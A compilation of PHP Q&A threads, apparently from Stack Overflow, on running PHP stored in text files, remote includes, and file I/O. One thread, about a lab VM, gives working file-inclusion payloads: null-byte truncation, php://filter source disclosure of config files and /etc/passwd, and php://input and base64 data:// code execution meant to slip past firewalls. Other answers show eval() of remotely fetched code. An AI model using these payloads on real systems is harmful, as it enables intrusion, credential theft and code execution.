If i had a text file on my web server, which contains full PHP code, all properly formatted, could i use PHP fopen to read the text file and echo the output of the PHP to the browser. Ie. Run PHP code that is held in a text file rather than hard coded?
Thanks
It's perfectly possible to do this (it's just another file after all), although I'd be tempted to directly include it rather that messing around with fopen/eval, etc. (N.B.: The file would of course have to be "fully formed" and begin with "<?php", etc. for the include to work.)
However, I'd be very wary of naming the file with a .txt extension as this will mean that it'll be possible to browse the contents of this file directly from the browser if it exists in the public HTTP docs area. As such, why not simply write the data into a .php file - this will be no more difficult than a .txt file and offers the advantage that it always be parsed by the web server if someone attempts to access it.
You can read in the file as you suggested using fopen you can then execute the string that is read in using eval. I wouldn't recommend this. Try another solution to what ever the actual problem is.
Related
I am trying to communicate between two servers through PHP. Lets say, there is one PHP file "a.php" on my localhost and another PHP file "b.php" on a remote server. I want to include b.php in a.php. I am trying to do this through include method by giving a full path of remore server "http://ip/b.php" but nothing happens.
Actually I want to run a part of script from a.php file then I want to communicate with b.php file and then return back to a.php file.
Please guide me how to do this. I know there are similar questions asked and I have tried to resolve this issue using those techniques but in vain.
Thank you
Nope, this setting is disabled/not allowed by default in most web servers (php.ini) so you can not use the include to include the files from a remote addresss for security reasons.
If you still want to allow inclusion of remote files, the directive allow_url_include must be set to On in php.ini
But again it is a bad practice, in a security-oriented point of view ; and, so, it is generally disabled (I've never seen it enabled, actually)
If you want to read the contents of a remote file though, you can use the file_get_contents function instead BUT this will be returned as pure HTML markup code, there won't be any server-side code.
including php file from another server with php
Another Solution is
Save your file as a text file removing the from it.
Access the file using file_get_contents
Example
http://ip/b.php - save this file as b.txt
<?php
$filedata = file_get_contents('http://ip/b.txt');
eval ("?>$filedata");
?>
As much as it is unsafe and bad practice, you can always turn off php for particular directory, using .htaccess (php_flag engine off).
Then your files will be served directly as a text files to whoever know url. That way you can include them via allow_url_include or as Mad Angle said get_file_contets.
But either way - its bad idea. So you can try it for science :)
I'm trying to exploit some web vulnerabilities in a sample website running inside a VM (it is not available on the web - only for educational purposes). I have a php file named setupreset.php which has the information about MySQL configs, setup and passwords used to setup the website. This is in the same directory as the rest of the php files (index, products, forum, etc...).
This is the code of index.php, for reference:
<?php
include ("includes/header.php");
// Grab inputs
$page = $_GET[page];
if ($page=="") {
include("home.html");
} else { include ($page . '.php'); }
include ("includes/footer.php");
?>
The main goal is to list the contents of the setupreset PHP file, or download it somehow. If I navigate to this file: http://10.211.55.5/index.php?page=setupreset, it gets executed, but the PHP code is naturally not shown, due to the fact that it is parsed by the PHP interpreter.
Now, the website uses PHP includes, so URLs look like this: http://10.211.55.5/index.php?page=products. This seems like it's vulnerable to remote file inclusion, where I could simply point to another PHP page, e.g. http://10.211.55.5/index.php?page=http://badwebsite.com/myevilscript.php but allow_url_include is off and cannot be changed, so this won't work (I tried this). However, allow_url_fopen is likely on (since it's on by default), so my question is the following: is it possible to upload a PHP file or some script that lists the content of setupreset.php using this kind of exploit?
If allow_url_include is off, you can't execute remote code. But you can find other pages, for example a content management dashboard, to upload your code as "image", then find the actual path and include it.
And, there are still ways to exploit.
Let's look inside your code. You may notice that it automatically add an extension .php at the end of path. So you should remove php in GET param. But what if the file you want to include does not have PHP extension? Then use %00 to terminate string, such as
http://localhost/include.php?page=../uploads/your_uploaded_fake_image.jpg%00
There's a special protocol in PHP, powerful and dangerous. It's php://.
You can check out the offcial manual for detailed information, and here I'll show you some cases to make a file inclusion vulnerability become source disclosure and even remote code execution vulnerabilities.
Before your test, I suggest you use Firefox with HackBar plugin. It's a powerful penetration testing suite.
Source disclosure
This feature doesn't need url inclusion allowed.
php://filter is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read. (Reference)
Then you can see the source secret.inc.php in the same directory via following request.
http://localhost/include.php?page=php://filter/read=convert.base64-encode/resource=secret.inc
File content will be encoded in base64, so it does support binary file.
It's powerful to get sensitive information, such as database passwords or a encryption key! If privilege is not proper configurated, it can even jump out of cage and extract data from files in outter directories, like /etc/passwd!
Remote code execution
Actually you can't exploit this way, because allow_url_include is Off in this case.
But I must point it out because it's magical!
It's completly different from local include. It doesn't need to upload any file to a remote server or so. All you need is one single request.
php://input can access the raw HTTP request body, so what does include("php://input") do? Just visit http://localhost/include.php?page=php://input, with valid PHP code in request body, then you can execute any (allowed) function in remote server!
Don't forget the %00 to drop .php tail.
Besides, PHP supports data:// URL scheme. You can directly put code in GET param! The following test doesn't need any special tool, just a normal browser can execute an attack.
http://localhost/include.php?page=data:text/plaintext,<?php phpinfo();?>
Some Web Application Firewalls may detect suspected string in URL and block evil request, they won't leave the phpinfo alone. Is there a way to encrypt? Of course. data:// URL supports at least base64 encoding...
http://localhost/include.php?page=data:text/plain;base64, PD9waHAgcGhwaW5mbygpOyA/Pg==
And you will get familiar phpinfo once again!
Note
The null byte trick (%00) does not work anymore for PHP >= 5.3.4: http://blog.benjaminwalters.net/?p=22139
Use a directory traversal and end your input string with a %00 NUL meta character (as mentioned on wikipedia).
http://example.com/index.php?page=setuppreset%00
This will remove the ".php" suffix from the inclusion and might help you somehow.
It is not. The php file is getting executed because you call include, if you called readfile, file_get_contents or similar you could see the contents of the php file.
How would i generate a file of all of the following types:
.js
.css
.html
I would also need to be able to read the file and overwrite it somehow.
Is this possible in anyway?
All of these files are just text files with different file extensions so if I could maybe make a text file and change the file extension?
As all of those are simply text files, all you need to do is create/open the file with the desired name and write text into them.
Check out some of the PHP file IO commands:
fopen()
fread()
fwrite()
fclose()
PHP is usually (often?) used as a templating language, where HTML "files" are generated "on-the-fly" and output directly to the browser.
I could be wrong, but it sounds like you are talking about generating files and saving them to disk to be served statically to the browser later. If that's the case, you're right - they are just text-files - so writing them as text-files with the relevant file extension should work.
This seems like it would be logistically complicated to manage as a site scales though. Also - if you're creating an web-interface to edit files on the server, while some CMS-es do this (Wordpress for example), it does come with a lot of security issues (allowing PHP unrestricted write access to your server is rarely a good move).
I have a file located on my server and I want to remotely access that file from another server and execute source code of the file from another PHP file located on the another server.
I have had a look at “File_get_contents” however this only obtains the content displayed by that PHP file, as can be seen below.
So therefore is it possible for a PHP file from an external server to read the source code of the PHP file located on my server and execute the commands on the external server?
You can use an extension other than .php for the source file, then use file_get_contents (or similar) to retrieve the contents.
Not using the php extensions will prevent PHP from parsing it as code, and just send it over as text instead.
However, that will also make the source readable to anyone who navigates to the file in a browser, as well as introducing a possible major vulnerability. You should look into why this is necessary and if it can be avoided somehow (perhaps calling the file on the other server with GET or POSTed parameters).
Is it possible in PHP to configure it to somehow not save files to disk at all? As a matter of fact, the best thing would be to get the script going before even reading the entire POST body. (Keeping my hopes high ;))
You can turn off file uploads via a configuration setting in PHP.
http://php.net/manual/en/ini.core.php#ini.file-uploads
PHP needs a place to temporarily store the files content for you to be able to interact with it through PHP - although, you don't have to do anything else other then access the temporary file to get the data:
$content = file_get_contents($_FILES["user_file"]["tmp_name"]);
From here on you can manipulate with the files content without having to move the uploaded file to another location before accessing it.
You can use HTTP PUT requests to directly upload a file. PHP will not handle the upload directly (e.g. set it up in $_FILES). Instead, you have to read the raw bytes from the php://input pseudo-url and from there can do whatever you want.
There's some details and examples here.